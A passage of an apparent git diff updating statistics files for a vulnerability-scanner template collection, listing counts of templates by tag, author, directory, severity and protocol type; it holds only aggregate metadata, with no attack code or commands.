@secureitmania","count":1},{"name":"elmahdi","count":1},{"name":"ooooooo_q","count":1},{"name":"d0rkerdevil","count":1},{"name":"its0x08","count":1},{"name":"gboddin","count":1},{"name":"yavolo","count":1},{"name":"r3naissance","count":1},{"name":"abison_binoy","count":1},{"name":"0xtavian","count":1},{"name":"taielab","count":1},{"name":"th3.d1p4k","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"sshell","count":1},{"name":"schniggie","count":1},{"name":"hanlaomo","count":1},{"name":"52971","count":1},{"name":"pdp","count":1},{"name":"_generic_human_","count":1},{"name":"cookiehanhoan","count":1},{"name":"ipanda","count":1},{"name":"kareemse1im","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"luskabol","count":1},{"name":"fmunozs","count":1},{"name":"tim_koopmans","count":1},{"name":"sullo","count":1},{"name":"ilovebinbash","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"naglinagli","count":1},{"name":"micha3lb3n","count":1},{"name":"yashgoti","count":1},{"name":"sicksec","count":1},{"name":"mhdsamx","count":1},{"name":"idealphase","count":1},{"name":"yashanand155","count":1},{"name":"flag007","count":1},{"name":"ldionmarcil","count":1},{"name":"ringo","count":1},{"name":"akash.c","count":1},{"name":"remonsec","count":1},{"name":"dudez","count":1},{"name":"johnjhacking","count":1},{"name":"raesene","count":1},{"name":"smaranchand","count":1},{"name":"arcc","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"blckraven","count":1},{"name":"dawid czarnecki","count":1},{"name":"hakluke","count":1},{"name":"johnk3r","count":1},{"name":"sy3omda","count":1},{"name":"c3l3si4n","count":1},{"name":"alph4byt3","count":1},{"name":"ajaysenr","count":1},{"name":"rojanrijal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"chron0x","count":1},{"name":"0xrod","count":1},{"name":"akshansh","count":1},{"name":"bolli95","count":1},{"name":"mohammedsaneem","count":1},{"name":"@dwisiswant0","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"thevillagehacker","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"bing0o","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"becivells","count":1},{"name":"andirrahmani1","count":1},{"name":"shreyapohekar","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"dogasantos","count":1},{"name":"kabirsuda","count":1},{"name":"w4cky_","count":1},{"name":"affix","count":1},{"name":"defr0ggy","count":1},{"name":"tirtha_mandal","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"thezakman","count":1},{"name":"undefl0w","count":1},{"name":"zandros0","count":1},{"name":"deena","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"qlkwej","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"mah3sec_","count":1},{"name":"alex","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"_harleo","count":1},{"name":"zhenwarx","count":1},{"name":"juicypotato1","count":1},{"name":"vsh00t","count":1},{"name":"alperenkesk","count":1}],"directory":[{"name":"home","count":1591}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"debug","count":13},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"cve2012","count":9},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"dlink","count":9},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"php","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"api","count":6},{"name":"google","count":6},{"name":"xxe","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"rails","count":6},{"name":"backup","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"lucee","count":5},{"name":"circarlife","count":5},{"name":"jetty","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"login","count":5},{"name":"drupal","count":5},{"name":"ruijie","count":5},{"name":"phpmyadmin","count":5},{"name":"confluence","count":5},{"name":"laravel","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"router","count":4},{"name":"magmi","count":4},{"name":"netgear","count":4},{"name":"artifactory","count":4},{"name":"jolokia","count":4},{"name":"django","count":4},{"name":"cve2009","count":4},{"name":"thinkcmf","count":4},{"name":"ibm","count":4},{"name":"docker","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"samsung","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"fileupload","count":4},{"name":"elastic","count":4},{"name":"vpn","count":4},{"name":"nodejs","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"webserver","count":4},{"name":"amazon","count":3},{"name":"backups","count":3},{"name":"dedecms","count":3},{"name":"springcloud","count":3},{"name":"git","count":3},{"name":"log","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"crlf","count":3},{"name":"slack","count":3},{"name":"openssh","count":3},{"name":"nosqli","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"terramaster","count":3},{"name":"deserialization","count":3},{"name":"nacos","count":3},{"name":"microstrategy","count":3},{"name":"mongodb","count":3},{"name":"kubernetes","count":3},{"name":"printer","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"windows","count":3},{"name":"lfr","count":3},{"name":"oa","count":3},{"name":"kafka","count":3},{"name":"fanruan","count":3},{"name":"r-seenet","count":3},{"name":"grafana","count":3},{"name":"ebs","count":3},{"name":"ofbiz","count":3},{"name":"splunk","count":2},{"name":"nextjs","count":2},{"name":"natshell","count":2},{"name":"openfire","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"kentico","count":2},{"name":"telerik","count":2},{"name":"httpd","count":2},{"name":"wordfence","count":2},{"name":"service","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"chamilo","count":2},{"name":"hp","count":2},{"name":"sharepoint","count":2},{"name":"waf","count":2},{"name":"bitrix","count":2},{"name":"huawei","count":2},{"name":"intrusive","count":2},{"name":"activemq","count":2},{"name":"rockmongo","count":2},{"name":"microsoft","count":2},{"name":"zhiyuan","count":2},{"name":"sonicwall","count":2},{"name":"icewarp","count":2},{"name":"seeyon","count":2},{"name":"saltstack","count":2},{"name":"trixbox","count":2},{"name":"ucmdb","count":2},{"name":"spark","count":2},{"name":"cve2008","count":2},{"name":"fortios","count":2},{"name":"coldfusion","count":2},{"name":"hashicorp","count":2},{"name":"globalprotect","count":2},{"name":"shellshock","count":2},{"name":"prometheus","count":2},{"name":"kibana","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"xxljob","count":2},{"name":"nexus","count":2},{"name":"emerge","count":2},{"name":"couchdb","count":2},{"name":"leak","count":2},{"name":"ecology","count":2},{"name":"zabbix","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"webcam","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"showdoc","count":2},{"name":"glassfish","count":2},{"name":"hpe","count":2},{"name":"plesk","count":2},{"name":"mida","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"injection","count":2},{"name":"rockethchat","count":2},{"name":"odoo","count":2},{"name":"smtp","count":2},{"name":"proxy","count":2},{"name":"vrealize","count":2},{"name":"oauth","count":2},{"name":"bigip","count":2},{"name":"frp","count":2},{"name":"pega","count":2},{"name":"flir","count":2},{"name":"maian","count":2},{"name":"paloalto","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"nagios","count":2},{"name":"exposures","count":2},{"name":"smb","count":2},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"bolt","count":1},{"name":"postgres","count":1},{"name":"dom","count":1},{"name":"timeclock","count":1},{"name":"redis","count":1},{"name":"grav","count":1},{"name":"redhat","count":1},{"name":"anchorcms","count":1},{"name":"rdp","count":1},{"name":"sarg","count":1},{"name":"springframework","count":1},{"name":"spectracom","count":1},{"name":"visionhub","count":1},{"name":"enum","count":1},{"name":"tongda","count":1},{"name":"harbor","count":1},{"name":"horde","count":1},{"name":"lotuscms","count":1},{"name":"symfony","count":1},{"name":"ambari","count":1},{"name":"plone","count":1},{"name":"centos","count":1},{"name":"apiman","count":1},{"name":"socomec","count":1},{"name":"fortinet","count":1},{"name":"zcms","count":1},{"name":"salesforce","count":1},{"name":"darkstat","count":1},{"name":"enumeration","count":1},{"name":"jsp","count":1},{"name":"ueditor","count":1},{"name":"mantisbt","count":1},{"name":"nedi","count":1},{"name":"openerp","count":1},{"name":"mailchimp","count":1},{"name":"etouch","count":1},{"name":"dlogin","count":1},{"name":"redwood","count":1},{"name":"linksys","count":1},{"name":"fuelcms","count":1},{"name":"jitsi","count":1},{"name":"xdcms","count":1},{"name":"fortilogger","count":1},{"name":"landray","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"wamp","count":1},{"name":"setup","count":1},{"name":"mediumish","count":1},{"name":"acexy","count":1},{"name":"opensns","count":1},{"name":"targa","count":1},{"name":"cve2005","count":1},{"name":"swagger","count":1},{"name":"cors","count":1},{"name":"zmanda","count":1},{"name":"mirai","count":1},{"name":"finereport","count":1},{"name":"zookeeper","count":1},{"name":"blind","count":1},{"name":"tenda","count":1},{"name":"pgadmin","count":1},{"name":"akamai","count":1},{"name":"mautic","count":1},{"name":"traefik","count":1},{"name":"octobercms","count":1},{"name":"fastapi","count":1},{"name":"kubeflow","count":1},{"name":"javafaces","count":1},{"name":"ssl","count":1},{"name":"svn","count":1},{"name":"episerver","count":1},{"name":"axis","count":1},{"name":"dotnetnuke","count":1},{"name":"bookstack","count":1},{"name":"thinkadmin","count":1},{"name":"cve2007","count":1},{"name":"node","count":1},{"name":"pacsone","count":1},{"name":"netis","count":1},{"name":"powercreator","count":1},{"name":"itop","count":1},{"name":"wp-theme","count":1},{"name":"b2evolution","count":1},{"name":"glances","count":1},{"name":"klog","count":1},{"name":"upload","count":1},{"name":"rujjie","count":1},{"name":"arl","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"webui","count":1},{"name":"expn","count":1},{"name":"blackboard","count":1},{"name":"nette","count":1},{"name":"drone","count":1},{"name":"szhe","count":1},{"name":"biometrics","count":1},{"name":"shopware","count":1},{"name":"ulterius","count":1},{"name":"rsyncd","count":1},{"name":"eyou","count":1},{"name":"extractor","count":1},{"name":"keenetic","count":1},{"name":"phpunit","count":1},{"name":"k8s","count":1},{"name":"jmx","count":1},{"name":"calendarix","count":1},{"name":"linkedin","count":1},{"name":"rubedo","count":1},{"name":"ems","count":1},{"name":"ntopng","count":1},{"name":"netsweeper","count":1},{"name":"bitly","count":1},{"name":"rabbitmq","count":1},{"name":"openrestry","count":1},{"name":"revision","count":1},{"name":"geddy","count":1},{"name":"yachtcontrol","count":1},{"name":"jsf","count":1},{"name":"cobub","count":1},{"name":"skywalking","count":1},{"name":"wuzhicms","count":1},{"name":"payara","count":1},{"name":"heroku","count":1},{"name":"tensorboard","count":1},{"name":"blue-ocean","count":1},{"name":"ioncube","count":1},{"name":"wiki","count":1},{"name":"ganglia","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"faraday","count":1},{"name":"tensorflow","count":1},{"name":"viewpoint","count":1},{"name":"mcafee","count":1},{"name":"emby","count":1},{"name":"bash","count":1},{"name":"bruteforce","count":1},{"name":"diris","count":1},{"name":"webmodule-ee","count":1},{"name":"db","count":1},{"name":"opencast","count":1},{"name":"feifeicms","count":1},{"name":"ecom","count":1},{"name":"tileserver","count":1},{"name":"zeroshell","count":1},{"name":"soar","count":1},{"name":"domxss","count":1},{"name":"discord","count":1},{"name":"bullwark","count":1},{"name":"nsasg","count":1},{"name":"druid","count":1},{"name":"codeigniter","count":1},{"name":"uwsgi","count":1},{"name":"acme","count":1},{"name":"beanshell","count":1},{"name":"hortonworks","count":1},{"name":"empirecms","count":1},{"name":"stem","count":1},{"name":"rhymix","count":1},{"name":"jeewms","count":1},{"name":"mpsec","count":1},{"name":"woocomernce","count":1},{"name":"xunchi","count":1},{"name":"adminer","count":1},{"name":"nc2","count":1},{"name":"flash","count":1},{"name":"subrion","count":1},{"name":"goahead","count":1},{"name":"kyan","count":1},{"name":"crm","count":1},{"name":"shopxo","count":1},{"name":"cloudflare","count":1},{"name":"igs","count":1},{"name":"primetek","count":1},{"name":"gloo","count":1},{"name":"cve2010","count":1},{"name":"monitorix","count":1},{"name":"nomad","count":1},{"name":"wooyun","count":1},{"name":"sitecore","count":1},{"name":"circontrorl","count":1},{"name":"selea","count":1},{"name":"panos","count":1},{"name":"parentlink","count":1},{"name":"lanproxy","count":1},{"name":"kerbynet","count":1},{"name":"nuuo","count":1},{"name":"sqlite","count":1},{"name":"rfi","count":1},{"name":"seacms","count":1},{"name":"javamelody","count":1},{"name":"aspnuke","count":1},{"name":"xml","count":1},{"name":"avtech","count":1},{"name":"myucms","count":1},{"name":"viewlinc","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"doh","count":1},{"name":"azure","count":1},{"name":"spidercontrol","count":1},{"name":"scs","count":1},{"name":"memcached","count":1},{"name":"totaljs","count":1},{"name":"phalcon","count":1},{"name":"majordomo2","count":1},{"name":"sidekiq","count":1},{"name":"fortigates","count":1},{"name":"wmt","count":1},{"name":"fortiweb","count":1},{"name":"dvwa","count":1},{"name":"dompdf","count":1},{"name":"zarafa","count":1},{"name":"robomongo","count":1},{"name":"moin","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"vscode","count":1},{"name":"zm","count":1},{"name":"pyramid","count":1},{"name":"phpinfo","count":1},{"name":"panabit","count":1},{"name":"wso2","count":1},{"name":"circontrol","count":1},{"name":"floc","count":1},{"name":"tamronos","count":1},{"name":"zend","count":1},{"name":"haproxy","count":1},{"name":"jfrog","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"csrf","count":1},{"name":"zimbra","count":1},{"name":"svnserve","count":1},{"name":"sentry","count":1},{"name":"hadoop","count":1},{"name":"webadmin","count":1},{"name":"ec2","count":1},{"name":"alibaba","count":1},{"name":"appweb","count":1},{"name":"nuxeo","count":1},{"name":"krweb","count":1},{"name":"ssltls","count":1},{"name":"liferay","count":1},{"name":"email","count":1},{"name":"wazuh","count":1},{"name":"landrayoa","count":1},{"name":"fedora","count":1},{"name":"plastic","count":1},{"name":"checkpoint","count":1},{"name":"clave","count":1},{"name":"jquery","count":1},{"name":"maccmsv10","count":1},{"name":"gateone","count":1},{"name":"synnefo","count":1},{"name":"weiphp","count":1},{"name":"upnp","count":1},{"name":"st","count":1},{"name":"gridx","count":1},{"name":"servicedesk","count":1},{"name":"saltapi","count":1},{"name":"trilithic","count":1},{"name":"aura","count":1},{"name":"fastcgi","count":1},{"name":"csod","count":1},{"name":"labtech","count":1},{"name":"concrete","count":1},{"name":"status","count":1},{"name":"tika","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"grails","count":1},{"name":"mdb","count":1},{"name":"vsphere","count":1},{"name":"pulsesecure","count":1},{"name":"vsftpd","count":1},{"name":"netrc","count":1},{"name":"wifisky","count":1},{"name":"74cms","count":1},{"name":"dotnet","count":1},{"name":"backdoor","count":1},{"name":"fiori","count":1},{"name":"lansweeper","count":1},{"name":"chinaunicom","count":1},{"name":"exchange","count":1},{"name":"duomicms","count":1},{"name":"firebase","count":1},{"name":"realteo","count":1},{"name":"opensmtpd","count":1},{"name":"rmc","count":1},{"name":"sprintful","count":1},{"name":"xiuno","count":1},{"name":"tapestry","count":1},{"name":"livezilla","count":1},{"name":"spring","count":1},{"name":"openstack","count":1},{"name":"k8","count":1},{"name":"gitlist","count":1},{"name":"codemeter","count":1},{"name":"idemia","count":1},{"name":"mysql","count":1},{"name":"jenkin","count":1},{"name":"portainer","count":1},{"name":"plc","count":1},{"name":"spf","count":1},{"name":"sco","count":1},{"name":"octoprint","count":1},{"name":"oscommerce","count":1},{"name":"optiLink","count":1},{"name":"netdata","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"opm","count":1},{"name":"zenario","count":1},{"name":"kafdrop","count":1},{"name":"gogs","count":1},{"name":"emc","count":1},{"name":"alertmanager","count":1},{"name":"cocoon","count":1},{"name":"pippoint","count":1},{"name":"nordex","count":1},{"name":"timesheet","count":1},{"name":"mara","count":1},{"name":"alerta","count":1},{"name":"2014","count":1},{"name":"erp-nc","count":1},{"name":"kong","count":1},{"name":"nexusdb","count":1},{"name":"ns","count":1},{"name":"dvr","count":1},{"name":"plugin","count":1},{"name":"turbocrm","count":1},{"name":"linkerd","count":1},{"name":"npm","count":1},{"name":"embedthis","count":1},{"name":"fortigate","count":1},{"name":"servicenow","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"proftpd","count":1},{"name":"triconsole","count":1},{"name":"comodo","count":1},{"name":"webmin","count":1},{"name":"cloudinary","count":1},{"name":"metinfo","count":1},{"name":"geutebruck","count":1},{"name":"clockwatch","count":1},{"name":"discourse","count":1},{"name":"mongo","count":1},{"name":"nps","count":1},{"name":"wavemaker","count":1},{"name":"htmli","count":1},{"name":"cgi","count":1},{"name":"zte","count":1},{"name":"varnish","count":1},{"name":"xff","count":1},{"name":"razor","count":1},{"name":"opentsdb","count":1},{"name":"ilo4","count":1},{"name":"clusterengine","count":1},{"name":"jenzabar","count":1},{"name":"postmessage","count":1},{"name":"flink","count":1},{"name":"moinmoin","count":1},{"name":"node-red-dashboard","count":1},{"name":"favicon","count":1},{"name":"zzzcms","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"wdahlenb","count":8},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"r3dg33k","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"melbadry9","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"caspergn","count":5},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"tess","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"binaryfigments","count":3},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"swissky","count":2},{"name":"pxmme1337","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"lu4nx","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xprial","count":2},{"name":"0xrudra","count":2},{"name":"0xsapra","count":2},{"name":"shifacyclewala","count":2},{"name":"incogbyte","count":2},{"name":"elsfa7110","count":2},{"name":"davidmckennirey","count":2},{"name":"joeldeleep","count":2},{"name":"0xelkomy","count":2},{"name":"udit_thakkur","count":2},{"name":"ehsahil","count":2},{"name":"unstabl3","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"random-robbie","count":2},{"name":"gevakun","count":2},{"name":"zomsop82","count":2},{"name":"ree4pwn","count":2},{"name":"jarijaas","count":2},{"name":"foulenzer","count":2},{"name":"moritz nentwig","count":2},{"name":"0xcrypto","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mavericknerd","count":2},{"name":"amsda","count":2},{"name":"streetofhackerr007","count":1},{"name":"_generic_human_","count":1},{"name":"mah3sec_","count":1},{"name":"wabafet","count":1},{"name":"c3l3si4n","count":1},{"name":"abison_binoy","count":1},{"name":"elmahdi","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"alex","count":1},{"name":"daviey","count":1},{"name":"yavolo","count":1},{"name":"micha3lb3n","count":1},{"name":"notsoevilweasel","count":1},{"name":"dudez","count":1},{"name":"koti2","count":1},{"name":"hakluke","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"juicypotato1","count":1},{"name":"thezakman","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"fopina","count":1},{"name":"nytr0gen","count":1},{"name":"w4cky_","count":1},{"name":"thevillagehacker","count":1},{"name":"mubassirpatel","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"berkdusunur","count":1},{"name":"ringo","count":1},{"name":"bjhulst","count":1},{"name":"b4uh0lz","count":1},{"name":"kareemse1im","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kurohost","count":1},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"whynotke","count":1},{"name":"omarkurt","count":1},{"name":"0h1in9e","count":1},{"name":"sy3omda","count":1},{"name":"regala_","count":1},{"name":"j33n1k4","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ooooooo_q","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"manuelbua","count":1},{"name":"cookiehanhoan","count":1},{"name":"mhdsamx","count":1},{"name":"rojanrijal","count":1},{"name":"furkansenan","count":1},{"name":"blckraven","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"vsh00t","count":1},{"name":"undefl0w","count":1},{"name":"0xrod","count":1},{"name":"52971","count":1},{"name":"gal nagli","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"th3.d1p4k","count":1},{"name":"_harleo","count":1},{"name":"becivells","count":1},{"name":"shifacyclewla","count":1},{"name":"flag007","count":1},{"name":"patralos","count":1},{"name":"ilovebinbash","count":1},{"name":"r3naissance","count":1},{"name":"sullo","count":1},{"name":"chron0x","count":1},{"name":"@dwisiswant0","count":1},{"name":"co0nan","count":1},{"name":"_c0wb0y_","count":1},{"name":"sickwell","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"hanlaomo","count":1},{"name":"jeya seelan","count":1},{"name":"fabaff","count":1},{"name":"zandros0","count":1},{"name":"apt-mirror","count":1},{"name":"taielab","count":1},{"name":"yashgoti","count":1},{"name":"remonsec","count":1},{"name":"bing0o","count":1},{"name":"tirtha_mandal","count":1},{"name":"divya_mudgal","count":1},{"name":"qlkwej","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ajaysenr","count":1},{"name":"sshell","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"its0x08","count":1},{"name":"schniggie","count":1},{"name":"alifathi-h1","count":1},{"name":"pudsec","count":1},{"name":"nkxxkn","count":1},{"name":"pdp","count":1},{"name":"kabirsuda","count":1},{"name":"shreyapohekar","count":1},{"name":"mohammedsaneem","count":1},{"name":"dawid czarnecki","count":1},{"name":"raesene","count":1},{"name":"0ut0fb4nd","count":1},{"name":"smaranchand","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"exploitation","count":1},{"name":"_darrenmartyn","count":1},{"name":"zhenwarx","count":1},{"name":"alperenkesk","count":1},{"name":"0xtavian","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"akshansh","count":1},{"name":"gboddin","count":1},{"name":"affix","count":1},{"name":"rtcms","count":1},{"name":"toufik airane","count":1},{"name":"sicksec","count":1},{"name":"ldionmarcil","count":1},{"name":"arcc","count":1},{"name":"idealphase","count":1},{"name":"naglinagli","count":1},{"name":"johnjhacking","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"andirrahmani1","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"dogasantos","count":1},{"name":"bolli95","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"vzamanillo","count":1},{"name":"rodnt","count":1},{"name":"noamrathaus","count":1},{"name":"deena","count":1},{"name":"s1r1u5_","count":1},{"name":"bad5ect0r","count":1},{"name":"ipanda","count":1},{"name":"akash.c","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ahmed sherif","count":1},{"name":"johnk3r","count":1}],"directory":[{"name":"cves","count":468},{"name":"vulnerabilities","count":234},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 942ea53ea9..7fcd055cf6 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,602 +1,602 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 462 | dhiyaneshdk | 202 | home | 1591 | info | 453 | http | 1408 | -| panel | 201 | pdteam | 184 | | | high | 396 | file | 42 | -| xss | 168 | pikpikcu | 177 | | | medium | 312 | network | 32 | -| wordpress | 166 | dwisiswant0 | 113 | | | critical | 186 | dns | 10 | -| rce | 161 | geeknik | 88 | | | low | 150 | | | -| exposure | 154 | daffainfo | 78 | | | | | | | -| cve2020 | 135 | madrobot | 59 | | | | | | | -| lfi | 127 | princechaddha | 50 | | | | | | | -| wp-plugin | 111 | gaurang | 42 | | | | | | | -| cve2019 | 82 | gy741 | 35 | | | | | | | -| config | 81 | ice3man | 26 | | | | | | | -| tech | 72 | pussycat0x | 25 | | | | | | | -| takeover | 71 | 0x_akoko | 20 | | | | | | | -| cve2021 | 70 | organiccrap | 19 | | | | | | | -| token | 63 | sheikhrishad | 15 | | | | | | | -| cve2018 | 61 | milo2012 | 13 | | | | | | | -| apache | 60 | techbrunchfr | 13 | | | | | | | -| default-login | 45 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | pr3r00t | 12 | | | | | | | -| file | 42 | cyllective | 11 | | | | | | | -| unauth | 39 | random_robbie | 10 | | | | | | | -| network | 32 | righettod | 9 | | | | | | | -| iot | 32 | nadino | 8 | | | | | | | -| sqli | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | wdahlenb | 8 | | | | | | | -| workflow | 28 | iamthefrogy | 8 | | | 